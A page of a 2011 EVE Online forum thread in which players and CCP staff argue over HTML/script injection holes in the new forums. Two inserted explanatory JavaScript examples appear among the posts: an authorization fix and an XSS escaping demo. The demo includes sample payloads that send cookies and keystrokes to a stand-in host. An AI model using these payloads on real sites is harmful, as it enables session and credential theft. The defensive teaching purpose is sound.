| Pages: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 .. 27 :: one page |
Thread Statistics | Show CCP posts - 36 post(s) |

Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
Posted - 2011.04.10 11:04:00 -
[271]
Edited by: Grimpak on 10/04/2011 11:04:51
Originally by: dexington
Originally by: Bomberlocks The problem is that an injected keylogger could conceivably get hold of your forum username and password.
Not going to happen without the user downloading and installing the program; you can't just inject a running keylogger using HTML. Unless the attack is exploiting a security hole in the browser, it would be much the same as linking a URL to malware on this forum.
Quote: The new EVE forums need a special plugin to read them. Install? <yes> <no>.
I think this type of attack is conceivable with the html vulnerabilities that existed on the forum. ---
Quote: The more I know about humans, the more I love animals.
ain't that right.

dexington
Caldari Baconoration
Posted - 2011.04.10 11:18:00 -
[272]
Edited by: dexington on 10/04/2011 11:19:45
Originally by: Grimpak
Quote: The new EVE forums need a special plugin to read them. Install? <yes> <no>.
I think this type of attack is conceivable with the html vulnerabilities that existed on the forum.
Even if this is possible you would still need to download the software from another server, and run it yourself. There would be no automated installation and execution of the keylogger.

Kerfira
Kerfira Corp
Posted - 2011.04.10 11:23:00 -
[273]
Edited by: Kerfira on 10/04/2011 11:25:22
Originally by: dexington Even if this is possible you would still need to download the software from another server, and run it yourself. There would be no automated installation and execution of the keylogger.
Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup?
That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts...
...and then of course there are all the usability problems on top...
Originally by: CCP Wrangler EVE isn't designed to just look like a cold, dark and harsh world, it's designed to be a cold, dark and harsh world.

simocast
Minmatar Razorback Industrial
Posted - 2011.04.10 11:26:00 -
[274]
Keep these old forums... I mean having a "like" feature and the fact the forums are annoying to read is a deal breaker.

Calathea Sata
State War Academy
Posted - 2011.04.10 11:30:00 -
[275]
I too along with many others (in fact MOST of the forum users) would like to keep the old forums.

Akita T
Caldari Navy Volunteer Task Force
Posted - 2011.04.10 11:41:00 -
[276]
Originally by: Spyke BlackIce I usually keep my arse out of whine-fests, troll parades, and general rock throwing, but this fiasco warrants grabbing my pitchfork and joining the mob if only because of the fact that after the two test runs of the new forums, they were released not only with HUGE, wide-open security problems, but little if any of the testers' feedback was heeded. I took part in the first test run (unfortunately I couldn't find enough time due to RL issues to help with the second) but when the forums opened, I could only find a minuscule few examples of the user feedback actually being used. Why bother with tests CCP, if our input is thrown out and disregarded along with the garbage?
It is becoming obvious that someone in upper management doesn't have a clue. They want their new toys - the way it was designed, regardless of flaws and lack of features - out the door and to hell with what the customer wants, needs, envisions, or finds lacking, and worse, to hell with the silly 'polished' idea. "Get it out so that we can move onto the next new toy and we'll finish fixing it later (maybe)", seems to be this person's (or persons') motto.
I actually have a lot of respect for most of the dev teams at CCP, and I applaud their apology and acknowledgement of the problem here as well as their dropping back and punting the old forums into service again. Many companies (no *cough* *S.O.E* *cough* names here) would have taken the stoic, we-know-best-and-you-couldn't-grasp-the-issues route by simply reopening the old forums with a message along the lines of "Due to technical issues, we will be using the old forums until further notice." and that would be that. I'm not implying that the web team should not be tarred-and-feathered for this MAJOR coding ineptitude they called a forum, but I seriously believe the issue began and ended in the top echelon of management. Something this bad quite frankly should not have happened, not even in the devs' worst nightmares. The issue HAD to be a time/deadline/personnel squeeze. Plain and simple.
Quoted it all because it bears repeating several times over. CCP needs to change its company leadership mindset. The notion that "new features sell, polished content doesn't" will be the doom of EVE if it persists much longer.
_
Make ISK||Build||React||1k papercuts _

Bomberlocks
Minmatar CTRL-Q
Posted - 2011.04.10 11:49:00 -
[277]
Originally by: dexington
Originally by: Bomberlocks The problem is that an injected keylogger could conceivably get hold of your forum username and password.
Not going to happen without the user downloading and installing the program; you can't just inject a running keylogger using HTML. Unless the attack is exploiting a security hole in the browser, it would be much the same as linking a URL to malware on this forum.
You don't need to download any software since the keylogger is done in JavaScript. The problem is posting that info to another domain, which the security model normally will not allow. However, there are ways around this, using either Flash raw sockets, cookies or iframes (or perhaps other methods that I don't know about, as I haven't coded any JS in the last two years). You could conceivably redirect the entire page to another site after the user has entered his credentials and then send it back.
All this depends on a number of things I'm not up to speed on, but when I used to code for banks some years ago, I was up to speed on things like this and my code would have to be pretty thoroughly reviewed before being implemented.

William Henry McGregor
Posted - 2011.04.10 11:55:00 -
[278]
Originally by: Ban Doga Looks like there isn't even someone to review the security concept. "... and then the server uses the character ID provided by the client to add the posting ..." should make someone fall out of their chair even without looking at any code at all.
Same with "... if a thread is locked the client will not show buttons to "like" postings, that'll suffice".
People are really fast to argue on the code level ("I don't review code", "It's just x lines of code", ...) when most of the problems are really on the conceptual level. IMO that suggests people are still struggling to get the code to do what they want and cannot even start to think about whether their concept makes sense (or not).
The new forum was "Broken by Design"(c)(TM) - same as this SpaceBook thingy.
CCP had better move from "new and shiny" hype to quality - but excellence is where they failed!
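The two design points Ban Doga is quoted on, the server taking the posting character's ID from the client and a locked thread being enforced only by the client hiding buttons, are both the same mistake: letting the browser make an authorization decision. The following is an added example, not CCP's code and not a description of their actual implementation. It shows a hypothetical post handler written the way the quote describes, beside one that takes the author from the server-side session, checks that the chosen character belongs to that account, and checks the thread's locked state on the server. The store shape, session cookie, thread IDs and character IDs are all constructed.

```javascript
// Added example (not CCP code): a post handler that trusts client-supplied
// identity and client-side UI state, beside one that does not.
// Every data shape below is constructed for illustration.

// Fresh in-memory store so each run starts clean.
function makeStore() {
  return {
    // session cookie value -> the account it authenticates and the
    // characters that account owns
    sessions: { 'sess-abc': { accountId: 1, characters: [1001, 1002] } },
    threads: { 42: { locked: false }, 43: { locked: true } },
    posts: [],
  };
}

// Vulnerable: the author is whatever characterId the request body carries,
// and "locked" is never checked because the UI hid the Reply button.
function addPostUnsafe(store, req) {
  const { threadId, characterId, body } = req.body;
  const post = { id: store.posts.length + 1, threadId, characterId, body };
  store.posts.push(post);
  return { ok: true, post };
}

// Hardened: identity comes from the session, ownership of the character is
// checked against that session, and thread state is checked on the server.
function addPostSafe(store, req) {
  const session = store.sessions[req.cookies && req.cookies.sessionId];
  if (!session) return { ok: false, status: 401, error: 'not authenticated' };

  const thread = store.threads[req.body.threadId];
  if (!thread) return { ok: false, status: 404, error: 'no such thread' };
  if (thread.locked) return { ok: false, status: 403, error: 'thread is locked' };

  // The client may pick which of its OWN characters posts, nothing more.
  const characterId = Number(req.body.characterId);
  if (!session.characters.includes(characterId)) {
    return { ok: false, status: 403, error: 'character not owned by this account' };
  }

  const post = {
    id: store.posts.length + 1,
    threadId: req.body.threadId,
    accountId: session.accountId,
    characterId,
    body: String(req.body.body),
  };
  store.posts.push(post);
  return { ok: true, post };
}

// Constructed requests: a forged author, a reply to a locked thread, a legitimate post.
const forgedAuthor = {
  cookies: { sessionId: 'sess-abc' },
  body: { threadId: 42, characterId: 9999, body: 'posting as someone else' },
};
const lockedThreadReply = {
  cookies: { sessionId: 'sess-abc' },
  body: { threadId: 43, characterId: 1001, body: 'the button was hidden, the URL was not' },
};
const legitimate = {
  cookies: { sessionId: 'sess-abc' },
  body: { threadId: 42, characterId: 1001, body: 'hello' },
};

// Run each request through both handlers and show the difference.
for (const [label, req] of [['forged author', forgedAuthor], ['locked thread', lockedThreadReply], ['legitimate', legitimate]]) {
  console.log(label.padEnd(14), 'unsafe:', JSON.stringify(addPostUnsafe(makeStore(), req)));
  console.log(''.padEnd(14), 'safe:  ', JSON.stringify(addPostSafe(makeStore(), req)));
}
```

The point of the hardened version is where each fact comes from: who is posting is read from the session, never from the body; which thread state applies is read from the store, never inferred from which buttons the client rendered. Removing the Reply button from a locked thread's HTML is a usability nicety, not a control.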

dexington
Caldari Baconoration
Posted - 2011.04.10 11:58:00 -
[279]
Originally by: Kerfira
Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup?
That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts...
Probably not as many as you think; everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, I'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right.
It is a problem that you could inject HTML into the page, and it does open up some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access; it's a common type of security flaw and it is considered a minor one.

Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
Posted - 2011.04.10 12:02:00 -
[280]
Originally by: dexington
Originally by: Kerfira
Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup?
That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts...
Probably not as many as you think; everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, I'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right.
It is a problem that you could inject HTML into the page, and it does open up some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access; it's a common type of security flaw and it is considered a minor one.
risk is still there tho, and that tickles many people's paranoia nerve, as well as scares people away. ---
Quote: The more I know about humans, the more I love animals.
ain't that right.

dexington
Caldari Baconoration
Posted - 2011.04.10 12:10:00 -
[281]
Originally by: Bomberlocks You don't need to download any software since the keylogger is done in JavaScript.
Was anyone able to inject JS code? I didn't see anything working except HTML.

Vaerah Vahrokha
Minmatar Vahrokh Consulting
Posted - 2011.04.10 12:15:00 -
[282]
Quote:
So basically what you are saying is if we used the new forums, our account details were exposed? Including credit card information?
Yeah ok. Between the anomaly nerf and CCP exposing everyone's account details including credit cards, I quit. This is just unacceptable. Great job CCP. I trusted you and this is how you treat your customers.
Time to spend my money on another game that doesn't expose my information.
No, it's much worse.
I was just wondering why Avira kept telling me that I was about to download an infected page....
Now, if you got a trojan, you can stop playing EvE TODAY and still all your future credit card and login information for everything you do will be sent to some pirate site for their perusal.
You will thank CCP and the web "masters" they used to (fail to) copy the open source forum they used, for your money losses, and for that maybe sue them.
Auditing | Research | 3rd Party | Collateral Holding | EvE RL Charity

Kerfira
Kerfira Corp
Posted - 2011.04.10 12:16:00 -
[283]
Originally by: dexington Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, i'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right.
The average internet user is PERFECTLY able to ignore warnings 
Also bear in mind that most people are actually not really complaining about the missing security... but about the general usability of the new forums... Quite frankly... They sucked!
Originally by: CCP Wrangler EVE isn't designed to just look like a cold, dark and harsh world, it's designed to be a cold, dark and harsh world.

Bomberlocks
Minmatar CTRL-Q
Posted - 2011.04.10 12:22:00 -
[284]
Originally by: dexington
Originally by: Bomberlocks You don't need to download any software since the keylogger is done in JavaScript.
Was anyone able to inject JS code? I didn't see anything working except HTML.
How do you think the HTML was injected?

CCP Navigator
C C P C C P Alliance

Posted - 2011.04.10 12:23:00 -
[285]
Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Navigator Lead Community Representative CCP Hf, EVE Online

dexington
Caldari Baconoration
Posted - 2011.04.10 12:37:00 -
[286]
Originally by: Bomberlocks
Originally by: dexington
Originally by: Bomberlocks You don't need to download any software since the keylogger is done in JavaScript.
Was anyone able to inject JS code? I didn't see anything working except HTML.
How do you think the HTML was injected?
You make it sound like JS was used to inject HTML; how do you inject JS when you can't inject HTML?
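The exchange above between Bomberlocks and dexington, and Bomberlocks' earlier point that a JavaScript keylogger needs no download, both turn on one fact: a forum that lets a poster's raw HTML reach other readers' browsers has already let that poster run script. Event-handler attributes, `javascript:` URLs and embedded frames execute without any `<script>` tag, and sending a GET request to a foreign host (an image load, a fetch) is not something the same-origin policy prevents; it restricts reading the response, not making the request. The following is an added example, not code from the EVE forums or from any poster. It renders a post body the unsafe way and the escaped way, then scans the result for the common script-bearing constructs. The payload strings, the `evil.example` host, and the `renderPost*` and `findScriptVectors` functions are constructed for illustration.

```javascript
// Added example (not code from the EVE forums): why letting a poster's HTML
// through is already letting them run script, and what output escaping changes.
// Payloads and the evil.example host are constructed for illustration.

// Escape the five characters that let text break out of a text node or a
// quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: author and body are concatenated into the page as-is,
// so any markup the poster wrote is parsed by every reader's browser.
function renderPostUnsafe(author, body) {
  return `<div class="post"><b>${author}</b><p>${body}</p></div>`;
}

// Hardened rendering: the same template with both fields escaped on output.
function renderPostSafe(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b><p>${escapeHtml(body)}</p></div>`;
}

// Scan rendered markup for the usual ways a tag carries executable code.
// Only tag tokens are inspected, so escaped text (no '<' left) can never hit.
// Returns a sorted list of vector names (empty array = nothing found).
function findScriptVectors(html) {
  const found = new Set();
  for (const tag of html.match(/<[^>]*>/g) || []) {
    const m = tag.match(/^<\s*\/?\s*([a-zA-Z][\w-]*)/);
    if (!m) continue;
    const name = m[1].toLowerCase();
    if (name === 'script') found.add('script-tag');
    if (name === 'iframe' || name === 'object' || name === 'embed') found.add('embedded-content');
    if (/\son[a-z]+\s*=/i.test(tag)) found.add('event-handler');
    if (/(href|src|data|action)\s*=\s*["']?\s*javascript:/i.test(tag)) found.add('javascript-url');
  }
  return [...found].sort();
}

// Constructed payloads. Only the last one uses a <script> tag; the first two
// and the last exfiltrate by a plain outbound request, which the browser allows.
const samplePayloads = [
  '<img src=x onerror="new Image().src=\'//evil.example/?c=\'+document.cookie">',
  '<svg onload="fetch(\'//evil.example/?c=\'+document.cookie)">',
  '<a href="javascript:void(0)">innocent looking link</a>',
  '<iframe src="//evil.example/fake-login"></iframe>',
  '<script>document.addEventListener("keypress", e => new Image().src="//evil.example/?k="+e.key)</script>',
];

// Render every payload both ways and report what the scanner sees in each.
function compareRenderings(author, payloads) {
  return payloads.map((body) => ({
    body,
    unsafe: findScriptVectors(renderPostUnsafe(author, body)),
    safe: findScriptVectors(renderPostSafe(author, body)),
  }));
}

for (const r of compareRenderings('Grimpak', samplePayloads)) {
  console.log(`unsafe=${JSON.stringify(r.unsafe).padEnd(22)} safe=${JSON.stringify(r.safe)}  ${r.body.slice(0, 48)}`);
}
```

The scanner is a review aid, not a sanitizer: the fix is `escapeHtml` on every field at output time (or an allow-list HTML sanitizer if posters are meant to use some markup), and the scanner simply confirms that nothing executable survives. Note that the author field is escaped too; a display name is user input like any other.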

Turix
Interstellar eXodus BricK sQuAD.
Posted - 2011.04.10 12:38:00 -
[287]
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
This doesn't appear to be the issue most people are concerned about. There appears to be much more concern over the design style and decisions made when implementing the new forums; consensus seems to be that people simply don't like them (See the threads in General Discussion/Assembly Hall).

Mag's
the united Negative Ten.
Posted - 2011.04.10 12:42:00 -
[288]
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
You've missed the point, again.
Your massive forum fu failure allowed for bad script injection. Sure the chance of anyone gaining any info was small, but there was still a chance.
Originally by: Allestin Villimar Also, if your bookmarks are too far out, they can and will ban you for it.
Originally by: Torothanax Low population in w systems makes afk cloaking unattractive.

Bomberlocks
Minmatar CTRL-Q
Posted - 2011.04.10 12:43:00 -
[289]
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
I would like to post a few pertinent facts:
- The person who was banned petitioned the vulnerability to CCP. It was not acted upon.
- Said person then proceeded to demonstrate that vulnerability after discussing it on the now-defunct SHC forums.
- Said person was banned for impersonating someone who was not himself.
- The forums were taken down.
- The forums were brought back up and CCP Fallout asserted that the vulnerabilities had been patched and "We would like to reiterate that your personal details and billing information have not been compromised, and that your eve online account was not at risk".
- The banned person then proceeded to post, as himself, in spite of being banned, in reply to CCP Fallout's assertion, thereby proving Fallout's assertion to be false.
- The forums were then taken down again.
- The forums were brought back up a while later.
- Later on, I presume after having discovered that the forums were still vulnerable, they were taken down again.
- The old forums were brought back up.
- Discussions involving said banned person are closed with further threats of banning, ignoring the fact that the story has already been widely spread on other forums, Facebook, Twitter and probably the media as well (Slashdot for example).
- You now claim, again, that customer data was never at risk.
In light of that information, how do you expect us to believe your current assertion without a transparent and open discussion of the vulnerability? The banned person can easily post his version anywhere else he chooses, and given his disproving of CCP's earlier assertions, I presume that the benefit of the doubt will go to him.
The ball, I think, is in your court.

Phocas Lebournes
Northbridge Services Group
Posted - 2011.04.10 12:46:00 -
[290]
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?

Ban Doga
Posted - 2011.04.10 12:53:00 -
[291]
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Are you sure? Scratch that, you were probably sure the new forums were ready to be rolled out too.
Are you saying at no time someone was able to access my personal information stored on CCP's systems? Or are you saying no one injected a keylogger/trojan/malware executing/downloading/installing signature that could access information on the forum users' system(s)?

CCP Navigator
C C P C C P Alliance

Posted - 2011.04.10 12:53:00 -
[292]
Originally by: Phocas Lebournes
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?
That is right. Your login and password would not have been compromised.
It should also be noted though that it is just good practice to change your passwords regularly 
Navigator Lead Community Representative CCP Hf, EVE Online

Phocas Lebournes
Northbridge Services Group
Posted - 2011.04.10 12:57:00 -
[293]
Originally by: CCP Navigator
Originally by: Phocas Lebournes
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?
That is right. Your login and password would not have been compromised.
It should also be noted though that it is just good practice to change your passwords regularly 
Cheers, in that case I am a happy chappy again. :)

Bomberlocks
Minmatar CTRL-Q
Posted - 2011.04.10 12:57:00 -
[294]
Originally by: CCP Navigator
Originally by: Phocas Lebournes
Originally by: CCP Navigator Thread has been cleaned up a little.
I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information.
CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover.
Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?
That is right. Your login and password would not have been compromised.
It should also be noted though that it is just good practice to change your passwords regularly 
I'm sorry, I don't believe you. There was a sample exploit on another forum showing exactly how easy it would be to inject a keylogger. However, as you will obviously ban any discussion of that exploit, it is impossible to discuss it here and you leave it to people with less than honourable intentions to discuss it elsewhere.

Mag's
the united Negative Ten.
Posted - 2011.04.10 13:08:00 -
[295]
Originally by: CCP Navigator
Originally by: Phocas Lebournes
Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?
That is right. Your login and password would not have been compromised.
It should also be noted though that it is just good practice to change your passwords regularly 
If you're as confident about this as you were about the new forums, everything should be fine yea?
Originally by: Allestin Villimar Also, if your bookmarks are too far out, they can and will ban you for it.
Originally by: Torothanax Low population in w systems makes afk cloaking unattractive.

Ellen Woods
Posted - 2011.04.10 13:10:00 -
[296]
Please, keep the new forum offline forever. The new forum is pain to read, oversized portraits, bad layout... This old forum is much smoother and comfortable to read, and imo it matters.

Calathea Sata
State War Academy
Posted - 2011.04.10 13:18:00 -
[297]
Originally by: Ellen Woods Please, keep the new forum offline forever. The new forum is pain to read, oversized portraits, bad layout... This old forum is much smoother and comfortable to read, and imo it matters.
Agreed. Now that I have tried both of them I can honestly say I will be much happier with the old forums because of all the reasons people have stated. Also the two minute timer does a good job of keeping the posts more intellectual and free from redundant gibberish. Also Verdana > Arial. Keep the old forums pls.

CCP Sreegs

Posted - 2011.04.10 13:24:00 -
[298]
Originally by: Steve Thomas
Originally by: CCP Sreegs Edited by: CCP Sreegs on 10/04/2011 03:10:15
Originally by: Marconus Orion
Originally by: Trocent I really wish these whiners were real programmers. They'd know how strange problems arise. Out of all the MMOs I played CCP still does a hell of a lot better than anyone else.
Also to all you whiners, remember that CCP could always make this a carebear game. That'd probably get a few million subscriptions and make a ton more money, but they don't. Feel grateful or leave.
Some of these people complaining are programmers. The same people who pointed out the problems before it went live. CCP just ignored them and shoved it out to the customers so they could say they Delivered.
If you have any evidence of this I'd welcome you to share it with me. [email protected]
I can save you the time: on this forum thread you have one IT systems developer who works for Kinder*Morgan Pipelines, two Web content developers from CITIgroup and a Network system specialist for The Clydesdale Bank PLC UK.
Now how many of them actually ARE in those fields is a matter of speculation. After all you can say whatever you like on Facebook.
I'm sure a lot of people work for a lot of good companies. What I was stating was that if anyone has any actual evidence of the malfeasance that was suggested they're welcome to email it to me.

Darth Vapour
Posted - 2011.04.10 13:26:00 -
[299]
Originally by: CCP Sreegs
I'm sure a lot of people work for a lot of good companies. What I was stating was that if anyone has an actual evidence of the malfeasance that was suggested they're welcome to email it to me.
Those responsible are working in the same building as you are.

CCP Sreegs

Posted - 2011.04.10 13:26:00 -
[300]
Originally by: Kerfira Edited by: Kerfira on 10/04/2011 08:53:07
Originally by: CCP Sreegs Just to keep you guys who weren't in the loop aware there will still be a security-related blog about the forum issues Monday or so. Now with BONUS CONTENT!
Sorry, but to me this (and the post after it) smells like CCP are pretending that the ONLY problems with the new forums were the security issues, and are deliberately ignoring all the other usability issues... If this is the case, then you really, REALLY(!) should take a step back and think a bit about the image you present to your customers.
The new forums were horrible to read, wasted a shedload of bandwidth (especially on mobile devices which is what a lot of people use these days), lacked very basic functionality that the current forums have, and were horribly slow.
In short, they were, and ARE, not ready for live deployment!
As one previous poster in this thread said, compare it with the introduction of the new contracts search... That was also a complete new interface, and I don't think I've seen a single complaint over it. Why? Because it replaced something BAD with something OK (still not 'good'). With the forums, you're replacing OK with BAD. No wonder people complain...
My job is security, therefore that's what I blog about. The reason we shut down the forums was security related.